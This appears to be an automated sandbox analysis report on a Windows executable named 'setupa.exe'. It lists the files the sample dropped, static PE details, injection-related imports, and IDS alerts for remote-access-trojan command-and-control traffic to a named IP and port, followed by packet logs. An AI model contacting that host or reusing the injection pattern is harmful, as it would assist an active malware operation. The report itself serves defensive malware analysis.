                                                                                                            Preview:p...... ....(.......s...(.......2...........,............................... ..........O.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.q.v.p.s.X.K.Y.8.R.R.Q.e.o.7.4.f.f.H.U.x.c.%.3.D...

                                                                                                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):412
                                                                                                            Entropy (8bit):3.9331883429620835
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKt2ElvXJty4/lXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:sMjy4/zmxMiv8sFFKbpgal7BlwhZg
                                                                                                            MD5:D3390CBABB4AC7EE2D5532ED848E5CED
                                                                                                            SHA1:501108FE196A36818E52F96AFF6E84A6F1407ABA
                                                                                                            SHA-256:18B3A69329B3B32B9B9ED2FDB826BD94563407E5D5EC879AC4FD0A1F498092D8
                                                                                                            SHA-512:E8DA73858FFAC5D1591E03A6B707D5F574968C49608305BCE59CE9A820F288E47B54B384963F3C3F8D403814299E04A3C3FC6CFA40086F2561ED850C1CA1475D
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ....(.......s...(.......2..........+......b..'....................b..'.. ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.p.D.q.V.C.b.A.T.U.v.i.Z.V.5.7.H.I.I.u.l.A.%.3.D...

                                                                                                            C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):330
                                                                                                            Entropy (8bit):3.8721745073549534
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKlkOf+k0zK/Lc8uScN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:2O0zCkPlE99Si1QyIeek
                                                                                                            MD5:8E827A7485B8CB4326CEF4E9CE9B48FC
                                                                                                            SHA1:6B9EB00BF1F44F1CB2443AF75213CBD2C9CDA313
                                                                                                            SHA-256:B95693875CA386048ADCEAC3B6E784A37BED17C3D5A52EB3190C7784AA46F91C
                                                                                                            SHA-512:7CC0188F389D8E8DF39EC18C763CA5514C89E0754C4D18FC9CE9C191B998B707E405092A150005B77874040F4A0865454629B3A25F3CEADC7F0ABFC816B91146
                                                                                                            Malicious:false
                                                                                                            Preview:p...... .........QP7s...(................QP7s.....S......................S.... ........B@!........(...........t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...

                                                                                                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\lsass.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):11136
                                                                                                            Entropy (8bit):7.976582322275708
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:7XjOa+ejjcSLq7q0h8wjsk+F7bZeOcpFs510szNYaEQfKHBPxPoZm0i7U0g:7TOaz3q7q8eNF7bZZNn+HV9Qm8D
                                                                                                            MD5:C4C123D56B00D3D0D8EB0FF41AEE2AA6
                                                                                                            SHA1:0CACF253851ADFCB7A878D44BF501E736F3C1B5A
                                                                                                            SHA-256:FC274740733B4A6DE8ADE2E6366DC7FFBCC078F3B4450140C2D17DFA6AEADB2A
                                                                                                            SHA-512:543DE7193EEC3D0E0DC11FAF5369DF80F35A0D16A831C8E7D2C53377CF4B2EE417526E21C5EB6C17EED86D299D7919B58E11BCA4B37C9ED51421180C26000852
                                                                                                            Malicious:false
                                                                                                            Preview:....t+..................z..O......5bx.p.L...~.T..... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ......#.qF....2.d...c4....[.6."6F............ ...x.A....2...+..nm3A.....za..]..p*.........?.m.1.....k{...;...d.l-.Q....*..nu`. ...N........z.U>.`...l.M..S~..G]z.h......9.....E...........E;m.......~.,.#.+\...xg!3<.{.9...5}.....0e...l$o....}..S.*..`[.n..~H.8...q...^.^.#.~?~.\G.U...N7..*...J)A.u...\.=.3."..Z..L...:.B.H"'.Bif....*..4.,.....7..&.m........@..I..Q?..y.f...g.T#.L~...?@..&5.._.;3E...J..(..E.....j0......{3&..;Q...^+J.1..:C..EP....4.T. .f.|O.I......%...j....C.k.cI1XP4O..J.:..og>.....k.g8Y6.q2h\f....V.X.A....7-V...X.... w......~)(.Xy:."......_.J..l..k.~..Z.;:.....}=%..N....?.O...&.(B...qs,......|..ju..}.m[...-.U..........x...6...!....{..E.Pr.d..E|.x.~....)....J ?..+o..{.Q..N.......N.`j..^..Ltk.......-....._P.2.P2.7..,.4...Hh.m3....q.W.0.2....TE.0.I..8..Xl..o....Iu...1+..Cr ].8..T.....B....t......=.........u...#..&x.L.W..y.#.

                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1835008
                                                                                                            Entropy (8bit):4.418970710247531
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:cSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:HvloTMW+EZMM6DFyn03w
                                                                                                            MD5:8C923A0FB4555EF288E70A3271C12712
                                                                                                            SHA1:64AB8BCF295917985485475E64A5E153AC82C2DC
                                                                                                            SHA-256:8B787B669708A28FD6DBE1692E539D134B59EBE0636C8857A9A46EA81C1E642F
                                                                                                            SHA-512:FEB2A07680A2A8470AE2F0E88C1FCBE31E4B8507E47DC4E6CBEBD0951E6A292E9EE76874C2C220FCC96712B672A57200C61E845F2014737204075D0940D233A7
                                                                                                            Malicious:false
                                                                                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.?..r...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                            Entropy (8bit):5.990412037287782
                                                                                                            TrID:
                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:setupa.exe
                                                                                                            File size:1'695'232 bytes
                                                                                                            MD5:60caff11e037bac89bdb4dd789d65fd7
                                                                                                            SHA1:2cd1508b227be4d1dbcde6a5bbe06209d52450ec
                                                                                                            SHA256:0b9fc8ca80e9d9571057feb6302b07eb48aa7d5e587a16b13bec21a05e44696f
                                                                                                            SHA512:3ab366c7557254c6ce4d3f66e9d22acd198dc0d4fa2ee0f065cbd0f02157733687e8eb59ecc1c08a0429968e151826a19563a9c75dd3d1e01414a0d5368133ce
                                                                                                            SSDEEP:24576:tLlotpgGeugfw9PD/CHCeI+mXm3TCyGKOlKeql7a7BbExGSW9X:tLSpgGCo9PbsWlKeqUBOBk
                                                                                                            TLSH:9E758E5A374496C1C2B7813EEAE25B4ED6A434018B61D7DF58A8C79E1F23AD80D3F721
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\[..\[..\[.U.[..\[.U.[".\[.U.[..\[I._Z..\[q6.[..\[..][..\[I.YZ..\[I.XZ..\[^.YZ..\[^..[..\[...[..\[^.^Z..\[Rich..\[.......

                                                                                                            File Icon

                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x1400063de
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x140000000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x5BB951C4 [Sun Oct 7 00:22:28 2018 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:60c29805358fbbce215652e2447e4d37

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp 00007F8E30EDA5A6h
                                                                                                            jmp 00007F8E30EA8ADDh
                                                                                                            jmp 00007F8E30EF56B4h
                                                                                                            jmp 00007F8E30EE667Bh
                                                                                                            jmp 00007F8E30F0D20Ah
                                                                                                            jmp 00007F8E30EFC221h
                                                                                                            jmp 00007F8E30E8EDECh
                                                                                                            jmp 00007F8E30EE2833h
                                                                                                            jmp 00007F8E30F63836h
                                                                                                            jmp 00007F8E30F0AE41h
                                                                                                            jmp 00007F8E30EFD748h
                                                                                                            jmp 00007F8E30F32727h
                                                                                                            jmp 00007F8E30F2CD4Eh
                                                                                                            jmp 00007F8E30F13E49h
                                                                                                            jmp 00007F8E30EE0664h
                                                                                                            jmp 00007F8E30EEA8CFh
                                                                                                            jmp 00007F8E30F4029Eh
                                                                                                            jmp 00007F8E30EFEFB1h
                                                                                                            jmp 00007F8E30E977C0h
                                                                                                            jmp 00007F8E30EB00C7h
                                                                                                            jmp 00007F8E30F741DAh
                                                                                                            jmp 00007F8E30F2D7ADh
                                                                                                            jmp 00007F8E30EF1E44h
                                                                                                            jmp 00007F8E30EAD03Bh
                                                                                                            jmp 00007F8E30EF0FBAh
                                                                                                            jmp 00007F8E30F608EDh
                                                                                                            jmp 00007F8E30F49384h
                                                                                                            jmp 00007F8E30F1C2FBh
                                                                                                            jmp 00007F8E30EDA086h
                                                                                                            jmp 00007F8E30E9F00Dh
                                                                                                            jmp 00007F8E30EAE194h
                                                                                                            jmp 00007F8E30E8CFF7h
                                                                                                            jmp 00007F8E30F414D6h
                                                                                                            jmp 00007F8E30E9F3DDh
                                                                                                            jmp 00007F8E30EC5CD4h
                                                                                                            jmp 00007F8E30F65833h
                                                                                                            jmp 00007F8E30F53842h
                                                                                                            jmp 00007F8E30F62F4Dh
                                                                                                            jmp 00007F8E30EE1FD0h
                                                                                                            jmp 00007F8E30E924ABh

                                                                                                            Rich Headers

                                                                                                            Programming Language:
                                                                                                            • [C++] VS2015 build 23026
                                                                                                            • [RES] VS2015 build 23026
                                                                                                            • [LNK] VS2015 build 23026

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1687c00x64.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x16c0000x37563.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1590000xd0ec.pdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a40000x19d0.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x1296600x28.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x128d700x94.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x1680000x7c0.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x10a2000x10a200263f51c964f439868f13087243f21e09False0.34826539748708313data5.741784022015556IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x10c0000x432b40x434004d292c70fba5070f4b1c2eee9b15f1d8False0.2558448536245353data4.048695729693801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0x1500000x84080x52004ded14349dcb6401ed2be80c806734f6False0.13805259146341464DIY-Thermocam raw data (Lepton 2.x), scale 22678-4416, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.8369333.746516705094803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .pdata0x1590000xe6f40xe800c6e879dce92d2c12b88d5903458b2627False0.49289466594827586data5.768572247241077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .idata0x1680000x1fde0x2000314578b046f2ce7b0ec0ce38b787563fFalse0.2691650390625dBase III DBT, version number 0, next free block index 1482080, 1st item ""4.0663092427575425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .tls0x16a0000x3090x400c573bd7cea296a9c5d230ca6b5aee1a6False0.021484375data0.011173818721219527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .00cfg0x16b0000x11b0x20040aa4324c85f833c79a3a29ca3da2eccFalse0.044921875data0.15517757530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0x16c0000x375630x37600f63b6fefda5ceff73447e2cd00291493False0.4044115053611738data5.527377392585506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0x1a40000x2dbc0x2e009d59bf2addd7ec11f28c7af906600bf6False0.22197690217391305data3.9125209396225573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_RCDATA0x16c1c00x2dd58ASCII text, with very long lines (65536), with no line terminatorsChineseChina0.48510141901393444
                                                                                                            RT_MANIFEST0x199f180x22fXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (499), with CRLF line terminatorsEnglishUnited States0.5295169946332737

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            ntdll.dllRtlPcToFileHeader, RtlUnwindEx, RtlCaptureStackBackTrace, NtSetInformationWorkerFactory, NtQueryInformationWorkerFactory, TpAllocJobNotification, TpAllocAlpcCompletion, NtSetTimer2, ZwSetIoCompletion, RtlAdjustPrivilege, NtAlpcConnectPort, NtAlpcSetInformation, NtAlpcCreatePort, ZwSetInformationFile, ZwAssociateWaitCompletionPacket, NtQueryObject, NtQueryInformationProcess, RtlNtStatusToDosError
                                                                                                            WINHTTP.dllWinHttpCrackUrl
                                                                                                            KERNEL32.dllWriteConsoleW, HeapSize, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, FindNextFileW, FindNextFileA, FindFirstFileExW, FindFirstFileExA, FindClose, OutputDebugStringA, GetCommandLineW, GetCommandLineA, SetEnvironmentVariableW, GetCurrentProcess, GetLastError, LocalFree, FormatMessageA, SearchPathA, CreateFileA, WriteFile, IsDebuggerPresent, CloseHandle, FreeLibrary, GetModuleHandleA, GetProcAddress, LoadResource, LockResource, SizeofResource, LoadLibraryA, LoadLibraryW, FindResourceA, CreateToolhelp32Snapshot, Process32First, Process32Next, CreateThreadpoolWork, CreateThreadpoolTimer, CreateThreadpoolWait, CreateThreadpoolIo, CreateFileW, DuplicateHandle, SetEvent, CreateEventW, OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateJobObjectW, AssignProcessToJobObject, SetInformationJobObject, WideCharToMultiByte, FormatMessageW, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObjectEx, Sleep, GetCurrentThread, GetCurrentThreadId, GetExitCodeThread, GetNativeSystemInfo, MultiByteToWideChar, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, TryEnterCriticalSection, CompareStringW, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, ResetEvent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, TerminateProcess, CreateTimerQueue, SignalObjectAndWait, SwitchToThread, CreateThread, SetThreadPriority, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, OutputDebugStringW, GetThreadTimes, FreeLibraryAndExitThread, GetModuleFileNameW, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualFree, VirtualProtect, SetProcessAffinityMask, ReleaseSemaphore, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, WaitForMultipleObjectsEx, WaitForSingleObject, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, RaiseException, ExitProcess, GetModuleHandleExW, HeapAlloc, ExitThread, ResumeThread, HeapReAlloc, HeapFree, GetStdHandle, GetModuleFileNameA, GetACP, GetFileType, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetProcessHeap, SetConsoleCtrlHandler, IsValidCodePage, GetOEMCP
                                                                                                            ADVAPI32.dllSystemFunction036

                                                                                                            Possible Origin

                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            ChineseChina
                                                                                                            EnglishUnited States

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-10-07T06:39:08.962828+02002052262ET MALWARE Win32/ProcessKiller CnC Initialization M11192.168.2.54970747.239.116.1586666TCP
                                                                                                            2024-10-07T06:39:13.355916+02002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.54970947.239.116.1586666TCP
                                                                                                            2024-10-07T06:39:17.979812+02002052262ET MALWARE Win32/ProcessKiller CnC Initialization M11192.168.2.54973947.239.116.1586666TCP
                                                                                                            2024-10-07T06:40:14.725647+02002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.54972847.239.116.1586666TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Oct 7, 2024 06:39:01.821239948 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:01.821341991 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:01.821453094 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:01.824052095 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:01.824095964 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.090195894 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.090398073 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.091135979 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.091202974 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.148869991 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.148947954 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.150032997 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.189912081 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.236857891 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.283406973 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.609041929 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.609098911 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.609117985 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.609155893 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.609174013 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.609224081 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.609249115 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.609281063 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.609282017 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.609306097 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.690504074 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.690562010 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.690603971 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.690629959 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.690658092 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.690677881 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.693627119 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.693671942 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.693702936 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.693716049 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.693743944 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.693769932 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.776736975 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.776837111 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.776875019 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.776894093 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.776926041 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.776949883 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.777343988 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.777384996 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.777415991 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.777426958 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.777456999 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.777473927 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.778446913 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.778485060 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.778517008 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.778527021 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.778553963 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.778568029 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.780142069 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.780184984 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.780217886 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.780229092 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.780255079 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.780273914 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.863518953 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.863574982 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.863779068 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.863780022 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.863810062 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.863864899 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.863924980 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.863965988 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.863996983 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.864007950 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.864033937 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.864058018 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.864454985 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.864496946 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.864531994 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.864542961 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.864572048 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.864590883 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.865120888 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.865178108 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.865192890 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.865210056 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.865241051 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.865257025 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.875078917 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.875122070 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.875152111 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.875164032 CEST4434970447.79.64.157192.168.2.5
                                                                                                            Oct 7, 2024 06:39:03.875190973 CEST49704443192.168.2.547.79.64.157
                                                                                                            Oct 7, 2024 06:39:03.875209093 CEST49704443192.168.2.547.79.64.157
